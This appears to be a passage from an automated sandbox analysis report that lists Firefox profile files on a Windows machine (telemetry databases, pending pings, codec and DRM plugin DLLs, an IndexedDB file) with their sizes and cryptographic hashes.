SHA512a449a2b29e7783f8246869f8fdbc7c3ca9dc69b0ac75dd49918d776a7912f5cf888db7439710a41f7c249728a201a9714585060e40edeb1d1c4a578bb8d54170
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp
Filesize15KB
MD568dd60611fbab514dbb5336fbf7daa95
SHA130051f2b1fae728a6ba17c699d4a0f78708fd978
SHA256b4cc876e584b19df5127ea76e17523ce0f34848b7ea08c2ba2edb3e0c69c35f7
SHA512cd6479d5d531306e08831823b9a65cf2b64b437f7b2800eb8e678d7c29c0e4b0b8b99fd7ae4e286392d3afbd0c0f5346121a57c3e4efd08f908a402ee121516d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD58346ac4ae6aaa239ec1a86f712e41cd1
SHA152f3b790e2e6c6ff39019282709d7fc235e97bf8
SHA25654b1756412908d559aefc73e4b24f941076b75ad51842545a3e483f31d422418
SHA512dbe14dc84bccf9c00931ea1f4b257bf3cd82871f43f1d3cc4acacf63dfddebb1068c2b78708baa7dd4a246eb7cabae607d0336b6c14b2d7104864b0885d9c8d8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\8e0666b5-a88f-4c5a-8e33-76133a5fd6be
Filesize25KB
MD507db0f51338e051be424bc2179b8aaa7
SHA1c3494a5ee61e99bb7f89f272e0fdf6f97138dfc1
SHA25659ebd6cdee0b0080593e637436a7639c32f08b53f89940e07c5a0323a5216e4c
SHA51244d5a82d1574d4585d3e844ed7b58590e73423c7981f4dd653bd44bc840194a4f40b0321179e4b0fb3e439dc78c4ce94dd3d684e3b816a6dfc6e422bc7734457
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\ed462406-83e4-485a-b1b9-1ef8079831c4
Filesize982B
MD5bcb4316ffcef9e57603b78017370eaf3
SHA1b7d322eae9eff51d8f4207fefc5b0c4051143a24
SHA256f262bbdb6dd805db72cbbfeda9048aae287fe95094b5daa447b61f4a14bf33ae
SHA512c5ffcc56283d257fe5abb0760079c6a592f529bed89f6f52b38dfae0ece00f1ffd7403853f618f8329f642b9a3909f06e44395f5dfaf111fa6ad96607f11e9da
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\datareporting\glean\pending_pings\f9323ff1-3a55-46e3-82fe-85e798d61bc5
Filesize671B
MD54f2d71528251aa9cef11cac8c944630e
SHA174e0722e033387a26ee03886653a496a05d8f8cf
SHA256dfa79786312c5cc0fbca9f08bc3bd8e37b3a144e6195c740b181f35c0e800e65
SHA5128e3e3a7d63d0b7cabb98d0dc8b298f81c25ba02d1514267eec36a1b17811c28522c58353b3a9bd82927ad2d377c00bedb65ee4f73034c9c0442b0ef10914bf84
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize372B
MD5bf957ad58b55f64219ab3f793e374316
SHA1a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA51279c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize17.8MB
MD5daf7ef3acccab478aaa7d6dc1c60f865
SHA1f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA5125840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize
11KB
MD5757213bb73dd0fdcb64b437d749b7258
SHA1d2acd8c82a631e0551f5fe37d05db389b8313050
SHA25694241dd0700e7b64ad86aa868b9ae348a1e41506b83edadba5bdac6a56b06cd7
SHA512231cf8c734cabdad06ff5d57ec036d0f440612d88026e0a60ad7eda0ab71e5396795fe5e87570f6d7cf97f23fae87b959a4e1874b86cb07dc540db29e4e1d711
-
Filesize
10KB
MD563778397934314a8c4fbea595706a09f
SHA16f9f50fcfb6b31c26fac39f77effcbd1cab7a95e
SHA256ef58f259479ceb67ee55624b95a6b6e87e297b5329981d2af3980216d13fe7e1
SHA512ce911ceb8d5d056daca23bdf9bc3d6aeea025501ac2680cffa23be7785a3e3296ab24283e775e675a9bd515e57185df72a682efd9b0ea1dc92b6d4b47d01f525
-
Filesize
10KB
MD558d841109f96850ab5e4f081f5ec43ae
SHA10a9b667c37d4f4fec464449df7387458e1596444
SHA256157505a7c3e1e98db7ab7ff0ff8eda4419f4e2b62022b359d4eb4a33d7207012
SHA51270ad9e8fe3b202a0ecd2502d1f1d2395014ee8616aed3419653da522349f98b6119c8c8d6efb8f95d4a11efadb075b29a708c0b6e815c05de4420e41949ae579
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n4zftpal.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.8MB
MD57787fe500e107cecfc6abb7592e6a64f
SHA1f7dda331d88277b0e9465123947db1f7b5f1746d
SHA256b744bb2995e553550d706f5e0a4ea1870263a13f8111823813bf2b2e07625d86
SHA51208677cd814be4302a25648fb3991ab8a5007f8c8e7da8353e6e9dd9afb9b9e0acb97f5b367b7f7a9bc40a7f80e991244233ade2eecfa7eb582dcb152f3d65583